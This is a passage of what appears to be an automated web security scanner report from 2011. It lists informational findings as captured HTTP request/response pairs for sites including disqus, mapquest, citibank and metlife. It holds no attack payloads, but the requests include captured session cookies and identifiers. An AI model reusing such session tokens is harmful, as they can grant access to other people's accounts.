Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sun, 24 Jul 2011 13:16:29 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Fri, 24 Jun 2011 13:16:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 24 Jun 2011 13:16:29 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>
28.9. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=2010860;type=2011t872;cat=europ762;ord=518583520315.5875? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.celebritycruises.com/specials/viewHTMLPromo.do?pagename=EuropePromotions&cS=vanity&vanity=EuropePromotion&cid=di_pgr_0601_dr11q2eu_1106_sky
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Fri, 24 Jun 2011 13:22:45 GMT
Expires: Fri, 24 Jun 2011 13:22:45 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 279
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img height="1" widt
...[SNIP]...
28.10. http://mediacdn.disqus.com/1308858010/build/system/def.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1308858010/build/system/def.html

Request

GET /1308858010/build/system/def.html HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1937626060-1305368047702; disqus_unique=525920122861; __utmz=113869458.1308705797.10.10.utmcsr=thepostgame.com|utmccn=(referral)|utmcmd=referral|utmcct=/blog/style-points/201106/coolest-features-athletes-homes; __utma=113869458.981292312.1305368048.1308571889.1308705797.10

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 23 Jun 2011 19:45:49 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 26621
X-Varnish: 883330359
Cache-Control: max-age=2529210
Expires: Sat, 23 Jul 2011 20:04:54 GMT
Date: Fri, 24 Jun 2011 13:31:24 GMT
Connection: close

<!DOCTYPE html>

<html>
<body>
<script>
document.domain = 'disqus.com';

var urls = {
sigma: (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//sigma.disqus.c
...[SNIP]...
28.11. http://mediacdn.disqus.com/1308858010/build/system/reply.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1308858010/build/system/reply.html

Request

GET /1308858010/build/system/reply.html HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1937626060-1305368047702; disqus_unique=525920122861; __utmz=113869458.1308705797.10.10.utmcsr=thepostgame.com|utmccn=(referral)|utmcmd=referral|utmcct=/blog/style-points/201106/coolest-features-athletes-homes; __utma=113869458.981292312.1305368048.1308571889.1308705797.10

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 23 Jun 2011 19:45:53 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 33052
X-Varnish: 883330589
Cache-Control: max-age=2529186
Expires: Sat, 23 Jul 2011 20:04:32 GMT
Date: Fri, 24 Jun 2011 13:31:26 GMT
Connection: close


<!DOCTYPE html>

<html>
<head>
<meta charset="utf-8">
<title></title>
<script>document.domain = 'disqus.com';</script>


<style type="text/css">

...[SNIP]...
28.12. http://mediacdn.disqus.com/1308858010/build/system/upload.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1308858010/build/system/upload.html

Request

GET /1308858010/build/system/upload.html HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1937626060-1305368047702; disqus_unique=525920122861; __utmz=113869458.1308705797.10.10.utmcsr=thepostgame.com|utmccn=(referral)|utmcmd=referral|utmcct=/blog/style-points/201106/coolest-features-athletes-homes; __utma=113869458.981292312.1305368048.1308571889.1308705797.10

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 23 Jun 2011 19:45:55 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 13745
X-Varnish: 2045866956
Cache-Control: max-age=2529241
Expires: Sat, 23 Jul 2011 20:05:24 GMT
Date: Fri, 24 Jun 2011 13:31:23 GMT
Connection: close

<html>
<head>
<meta charset="utf-8">
<title></title>
<script>document.domain = 'disqus.com';</script>


<style type="text/css">
html,body,div,span,applet,object,ifram
...[SNIP]...
28.13. https://softlayer.parallelsmarketplace.com/design/css/spin.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://softlayer.parallelsmarketplace.com
Path:   /design/css/spin.css

Request

GET /design/css/spin.css HTTP/1.1
Host: softlayer.parallelsmarketplace.com
Connection: keep-alive
Referer: https://softlayer.parallelsmarketplace.com/store/index.php?NAME_PATH=LICENCES_PATH&SCREEN=CHECKOUT_SCREEN&PHPSESSID=6a9429b7d6c03539695bbec853449bea&PHPSESSID=6a9429b7d6c03539695bbec853449bea
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea

Response

HTTP/1.1 404 Not Found
Date: Fri, 24 Jun 2011 17:45:24 GMT
Server: Apache/2.2.11 (Unix) PHP/4.4.9 mod_ssl/2.2.11 OpenSSL/0.9.8b
Last-Modified: Thu, 03 Dec 2009 18:49:53 GMT
ETag: "24800dd-bc-479d774e5f640"
Accept-Ranges: bytes
Content-Length: 188
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<HTML> <HEAD> <TITLE>404-not found</TITLE> </HEAD><BODY> <H1> Error occurred: 404 - not found</H1><HR><ADDRESS> Apache Server at: d1000130.parallelsmarketplace.com</ADDRESS></BODY> </HTML>
28.14. http://web.sa.mapquest.com/Images/spacer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.sa.mapquest.com
Path:   /Images/spacer.gif

Request

GET /Images/spacer.gif HTTP/1.1
Host: web.sa.mapquest.com
Proxy-Connection: keep-alive
Referer: http://web.sa.mapquest.com/mobil1/?tempset=search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
MIME-Version: 1.0
Date: Fri, 24 Jun 2011 13:32:48 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Cteonnt-Length: 541
Connection: close
Content-Length: 541

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML>
<HEAD>
<TITLE>Not Found</TITLE>
</HEAD>
<BODY>
<H2>Not Found</H2>
The requested URL was not found on this server.
<P ALIGN=RIGHT><SMALL><I>AOL
...[SNIP]...
28.15. http://web.sa.mapquest.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.sa.mapquest.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: web.sa.mapquest.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
MIME-Version: 1.0
Date: Fri, 24 Jun 2011 13:32:49 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Cteonnt-Length: 541
Connection: close
Content-Length: 541

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML>
<HEAD>
<TITLE>Not Found</TITLE>
</HEAD>
<BODY>
<H2>Not Found</H2>
The requested URL was not found on this server.
<P ALIGN=RIGHT><SMALL><I>AOL
...[SNIP]...
28.16. http://www.asiawebdirect.com/forms/portal-feedback.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.asiawebdirect.com
Path:   /forms/portal-feedback.html

Request

GET /forms/portal-feedback.html?page=http://www.phuket.com/ HTTP/1.1
Host: www.asiawebdirect.com
Proxy-Connection: keep-alive
Referer: http://phuket.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:36 GMT
Server: Apache/2.2.17
Accept-Ranges: bytes
Content-Length: 27786
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
</head>
<body>


<style>
bo
...[SNIP]...
28.17. http://www.citibank.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citibank.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.citibank.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FD979085078411-600001004008D908[CE]; JSESSIONID=161vTGQPdmpd431rpdvL5QyfyK1Gs0nvqPMfyn3TTMnT8TB1zyyV!-797163621; CP=null*

Response

HTTP/1.1 404 Not found
Server: ""
Date: Fri, 24 Jun 2011 13:28:27 GMT
Content-type: text/html
Connection: close
Content-Length: 14811

<HTML>
<HEAD>
   <style>
   <!--
       body {
           background: #fff;
       }
       .notextdecor{
           COLOR: #000099;
           TEXT-DECORATION: none;
       }
       TD{
           COLOR: #000000;
           FONT-FAMILY: verdana, arial, helvetica, sans
...[SNIP]...
28.18. http://www.epm.com.co/epm/web/_admincom/diccionario/_admincom_dict_lista.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epm.com.co
Path:   /epm/web/_admincom/diccionario/_admincom_dict_lista.html

Request

GET /epm/web/_admincom/diccionario/_admincom_dict_lista.html HTTP/1.1
Host: www.epm.com.co
Proxy-Connection: keep-alive
Referer: http://www.epm.com.co/epm/web/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=6211303.1308934761.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=6211303.1146028634.1308934761.1308934761.1308934761.1; __utmc=6211303; __utmb=6211303.2.10.1308934761

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 43619
Date: Thu, 23 Jun 2011 15:10:05 GMT
Content-Type: text/html
ETag: "787e7b83d590cb1:5897"
Server: Microsoft-IIS/6.0
Accept-Ranges: bytes
Last-Modified: Tue, 30 Nov 2010 21:28:21 GMT
X-Powered-By: ASP.NET
Vary: Accept-Encoding

<ul id="lista_terminos">
   <li><a href="accesorios.html">Accesorios</a></li>
<li><a href="ACEITEDIELECTRICO.html">
    Aceite diel..ctrico</a></li>
<li>
    <a href="acometida.html">Acometida</a></l
...[SNIP]...
28.19. http://www.epm.com.co/epm/web/_admincom/menuinstitucional2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epm.com.co
Path:   /epm/web/_admincom/menuinstitucional2.html

Request

GET /epm/web/_admincom/menuinstitucional2.html HTTP/1.1
Host: www.epm.com.co
Proxy-Connection: keep-alive
Referer: http://www.epm.com.co/epm/web/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=6211303.1308934761.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=6211303.1146028634.1308934761.1308934761.1308934761.1; __utmc=6211303; __utmb=6211303.2.10.1308934761

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 2921
Date: Fri, 24 Jun 2011 16:57:11 GMT
Content-Type: text/html
ETag: "b6157ddd92acc1:5897"
Server: Microsoft-IIS/6.0
Accept-Ranges: bytes
Last-Modified: Tue, 14 Jun 2011 21:27:29 GMT
X-Powered-By: ASP.NET
Vary: Accept-Encoding

<ul id="navmenu-v">
<li><a href="http://www.epm.com.co/epm/web/acercade/epm_acercade.html">Acerca de EPM</a></li>
<li><a href="#">Servicio al Cliente</a>
<ul>
<li><a href="http://w
...[SNIP]...
28.20. http://www.epm.com.co/epm/web/_assets/code/redes_sociales.cfg.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epm.com.co
Path:   /epm/web/_assets/code/redes_sociales.cfg.html

Request

GET /epm/web/_assets/code/redes_sociales.cfg.html HTTP/1.1
Host: www.epm.com.co
Proxy-Connection: keep-alive
Referer: http://www.epm.com.co/epm/web/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=6211303.1308934761.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=6211303.1146028634.1308934761.1308934761.1308934761.1; __utmc=6211303; __utmb=6211303.2.10.1308934761

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 391
Date: Fri, 24 Jun 2011 09:49:51 GMT
Content-Type: text/html
ETag: "80caead0ee6acb1:5897"
Server: Microsoft-IIS/6.0
Accept-Ranges: bytes
Last-Modified: Wed, 13 Oct 2010 15:53:45 GMT
X-Powered-By: ASP.NET
Vary: Accept-Encoding

<ul>
   <li><a href="http://www.youtube.com/user/EPMColombia">YouTube</a></li>
   <li><a href="http://www.caminoalbarrio.tv/">Camino al Barrio</a></li>
   <li><a href="http://www.facebook.com/pages/EPM-e
...[SNIP]...
28.21. http://www.exxonmobilstations.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.exxonmobilstations.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.exxonmobilstations.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6m0100r2iivameub0gdtubf65; style=medium

Response

HTTP/1.1 404 Not Found
Date: Fri, 24 Jun 2011 13:54:45 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Length: 302
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
<hr>
<
...[SNIP]...
28.22. http://www.mapquest.com/cdn/_uac/adpage.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /cdn/_uac/adpage.htm

Request

GET /cdn/_uac/adpage.htm HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="PuS5h/EipDX1lQ3yENE105ZQuwQ="; tsexpiry=1; psession="htZQI27rp9upP5M1sdqhuRpH5n4="; s_pers=%20s_getnr%3D1308924922785-New%7C1371996922785%3B%20s_nrgvo%3DNew%7C1371996922786%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; c_Id=MjQyOjQwNA%3D%3D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: c_Id=MjQyOjQwNA%3D%3D; Expires=Fri, 24-Jun-2011 14:45:26 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"1171-1308839292000"
Last-Modified: Thu, 23 Jun 2011 14:28:12 GMT
Content-Type: text/html
Cteonnt-Length: 1171
Date: Fri, 24 Jun 2011 14:15:25 GMT
Content-Length: 1171

<html>
<head>
<script type='text/javascript'>
var blockedReferrer = "";
var dom=location.hash
if (dom!=''){
dom=dom.substr(1)
document.domain=dom
}

function adsPageOnL(){
var adFr=window.frameE
...[SNIP]...
28.23. http://www.metlife.com/assets/cao/iws/hp/ind/hero/metricsblank.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metlife.com
Path:   /assets/cao/iws/hp/ind/hero/metricsblank.gif

Request

GET /assets/cao/iws/hp/ind/hero/metricsblank.gif HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; MetTempReq=true; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; MetlifeSU=0; siscweb=XUPOLRS172.24.35.19CKMQQ

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:00:31 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 09 Jun 2011 06:44:50 GMT
Content-Length: 1246
Content-Type: text/html
Content-Language: en-US

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1
...[SNIP]...
28.24. http://www.metlife.com/wps/proxy/MCPremiumQuoteWS/MCHealthClassOption  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metlife.com
Path:   /wps/proxy/MCPremiumQuoteWS/MCHealthClassOption

Request

GET /wps/proxy/MCPremiumQuoteWS/MCHealthClassOption? HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; MetlifeSU=0; siscweb=XUPOLRS172.24.35.19CKMQQ; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1308935068484:ss=1308935068484; __utmz=50475317.1308935069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50475317.2023485494.1308935069.1308935069.1308935069.1; __utmc=50475317; __utmb=50475317.1.10.1308935069

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:00:40 GMT
Server: IBM_HTTP_Server
Vary: Accept-Encoding
Content-Type: text/html
Content-Language: en-US
Content-Length: 123

<textarea>{"statuscode":"0","statusmsg":"Successful","healthoptions":"E:Excellent;VG:Very Good;G:Good ;F:Fair;"}</textarea>
28.25. http://www.metlife.com/wps/proxy/MCPremiumQuoteWS/MCPremiumQuote  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metlife.com
Path:   /wps/proxy/MCPremiumQuoteWS/MCPremiumQuote

Request

GET /wps/proxy/MCPremiumQuoteWS/MCPremiumQuote?term=20&age=51&gender=M&health=E&tobacco=Yes&coverage=300000&state=AL&lstPnPParameters=state%2CDOB%2Ccoverage%2Cterm%2Ctobacco%2Chealth%2Cgender%2ClStatus&lStatus=Q&rating=0 HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; MetlifeSU=0; siscweb=XUPOLRS172.24.35.19CKMQQ; __utmz=50475317.1308935069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1308935083487:ss=1308935068484; __utma=50475317.2023485494.1308935069.1308935069.1308935069.1; __utmc=50475317; __utmb=50475317.3.9.1308935083499

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:01:16 GMT
Server: IBM_HTTP_Server
Vary: Accept-Encoding
Content-Type: text/html
Content-Language: en-US
Content-Length: 83

<textarea>{"statuscode":"0","statusmsg":"Successful","premium":"225.72"}</textarea>
28.26. http://www.phuket-travel.com/checkavailability/currency.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phuket-travel.com
Path:   /checkavailability/currency.php

Request

GET /checkavailability/currency.php HTTP/1.1
Host: www.phuket-travel.com
Proxy-Connection: keep-alive
Referer: http://www.phuket-travel.com/premium-packages/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221167833.1308921744.1.1.utmcsr=phuket.com|utmccn=(referral)|utmcmd=referral|utmcct=/islands/index.htm; JSESSIONID=48D389D0F243F4CD82ACA4D8422C50D0; s_evar38=AWDINP1356; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=221167833.643271157.1308921743.1308921743.1308921743.1; __utmc=221167833; __utmb=221167833.3.10.1308921743

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:03 GMT
Server: Apache/2.2.17
Cache-Control: max-age=0
Expires: Fri, 24 Jun 2011 13:30:03 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 85
Content-Type: text/html


       <script language="javascript">
           parent.backresult("30.45 Baht");
       </script>
   

28.27. http://www.phuket-travel.com/reserve/indexShort.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phuket-travel.com
Path:   /reserve/indexShort.php

Request

GET /reserve/indexShort.php?action=dest&dest=75&deF=0&lang=en HTTP/1.1
Host: www.phuket-travel.com
Proxy-Connection: keep-alive
Referer: http://www.phuket-travel.com/premium-packages/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221167833.1308921744.1.1.utmcsr=phuket.com|utmccn=(referral)|utmcmd=referral|utmcct=/islands/index.htm; JSESSIONID=48D389D0F243F4CD82ACA4D8422C50D0; s_cc=true; s_evar38=AWDINP1356; __utma=221167833.643271157.1308921743.1308921743.1308921743.1; __utmc=221167833; __utmb=221167833.2.10.1308921743; s_sq=wotifcom-awd-global-prd%3D%2526pid%253Dphuket-travel.com%25253Atours%25253Athailand%25253Aphuket%25253Aphuket%252520tours%252520%252526%252520travel%2526pidt%253D1%2526oid%253Dhttp%25253A//www.phuket-travel.com/premium-packages/index.htm%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:29:23 GMT
Server: Apache/2.2.17
Cache-Control: max-age=0
Expires: Fri, 24 Jun 2011 13:29:23 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 577
Content-Type: text/html

var aaRrDeSt = new Array("All Destinations", "Ao Por", "Bang Tao", "Chalong", "Kamala Beach", "Karon Beach", "Kata Beach", "Koh Yao", "Mai Khao", "Nai Harn", "Nai Thon", "Nai Yang", "Nearby Island", "
...[SNIP]...
28.28. http://www.phuket-travel.com/scripts/scripts.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phuket-travel.com
Path:   /scripts/scripts.htm

Request

GET /scripts/scripts.htm HTTP/1.1
Host: www.phuket-travel.com
Proxy-Connection: keep-alive
